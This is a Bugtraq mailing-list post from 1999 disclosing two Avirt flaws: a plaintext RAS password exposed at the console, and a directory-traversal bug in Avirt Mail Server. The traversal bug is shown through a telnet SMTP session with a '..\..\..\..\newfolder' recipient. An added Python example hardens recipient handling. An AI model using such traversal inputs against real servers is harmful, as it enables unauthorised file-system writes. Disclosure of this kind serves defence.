Bugtraq mailing list archives
Avirt Mail Server 3.3a or 3.5 remotely exploitable buffer overflow vulnerability
From: aguileta () EUNATE NET (Jesús López de Aguileta)
Date: Tue, 2 Nov 1999 16:12:41 +0100
----- Original Message -----
From: Luciano Martins <luck () USSRBACK COM>
To: <BUGTRAQ () SECURITYFOCUS COM>
Sent: Monday, November 01, 1999 9:57 AM
Subject: Avirt Mail Server 3.3a or 3.5 remotely exploitable buffer overflow vulnerability
I posted another 2 bugs concerning Avirt Gateway and Avirt Mail Server 3.3 and 3.5 in BUGTRAQ-ES a month ago. I will try (excuse my poor English) to translate this message here.

1) Anybody with console access could retrieve the RAS password in Avirt Gateway. Changing the username in "Internet connection" properties and pressing the "test" button makes Avirt present a message box with the password in plaintext.

2) Anybody on the Intranet could make directories anywhere on the NT machine running Avirt Mail Server.

telnet 192.168.0.1 25
220 server aVirt Mail SMTP Server Ready.
mail from:foo
250 foo, Sender OK
rcpt to:..\..\..\..\newfolder
250 ..\..\..\..\newfolder, Receipient OK
data
354 Please enter mail, ending with a "." on a line by itself
Textinside
.
250 Mail accepted.
This will create a root folder named "newfolder" with a file inside it. Fortunately it appears to be impossible to overwrite an existing directory.

Avirt was notified about these security flaws on 23/8/99.

Regards
Jesús López de Aguileta
EunateNet
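
The SMTP session in the message above, seen from the server side: an added example, not part of the original post and not Avirt's code. It assumes the server derives a mailbox directory by joining the RCPT TO value onto a spool root; SPOOL_ROOT and all function names are hypothetical.

```python
import ntpath  # Windows path semantics, so this runs the same on any OS
import re

SPOOL_ROOT = r"C:\MailSpool"  # hypothetical spool directory, not from the post

# Conservative allow-list for a local mailbox name: separators, drive letters,
# control characters and names starting with a dot cannot pass.
_MAILBOX_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")

def naive_mailbox_dir(rcpt: str) -> str:
    """Assumed vulnerable pattern: recipient joined straight onto the root."""
    return ntpath.normpath(ntpath.join(SPOOL_ROOT, rcpt))

def safe_mailbox_dir(rcpt: str) -> str:
    """Return the mailbox directory for rcpt, or raise ValueError (reply 550)."""
    local = rcpt.strip().strip("<>").split("@", 1)[0]
    if not _MAILBOX_RE.fullmatch(local) or ".." in local:
        raise ValueError("550 invalid recipient")
    path = ntpath.normpath(ntpath.join(SPOOL_ROOT, local))
    # Defence in depth: the resolved path must sit directly under the root.
    if ntpath.dirname(path).lower() != SPOOL_ROOT.lower():
        raise ValueError("550 invalid recipient")
    return path

def is_accepted(rcpt: str) -> bool:
    """True if the hardened check would answer 250 to this RCPT TO value."""
    try:
        safe_mailbox_dir(rcpt)
        return True
    except ValueError:
        return False

# Constructed sample recipients; the second is the value used in the session.
SAMPLES = ["foo", r"..\..\..\..\newfolder", "../../newfolder",
           r"D:\newfolder", "bob@example.test"]

if __name__ == "__main__":
    for rcpt in SAMPLES:
        print(f"{rcpt!r:28} naive -> {naive_mailbox_dir(rcpt)!r:24} "
              f"accepted={is_accepted(rcpt)}")
```

The check belongs at RCPT TO time, so the server answers 550 before any DATA is accepted and nothing is written to disk.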